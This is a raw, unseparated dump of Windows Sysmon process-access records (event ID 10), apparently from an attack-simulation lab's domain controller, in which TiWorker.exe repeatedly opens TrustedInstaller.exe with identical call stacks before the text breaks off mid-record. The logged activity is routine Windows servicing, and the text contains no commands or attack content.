10341000x800000000000000012624Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.888{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012623Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.888{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012622Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.888{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012621Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.873{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012620Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.873{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012619Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.873{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012618Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.857{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012617Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.857{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012616Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.842{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012615Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.842{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012614Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.826{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012613Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.826{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012612Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.826{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012611Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.826{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012610Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.826{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012609Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.826{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012608Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.810{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012607Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.810{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012606Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 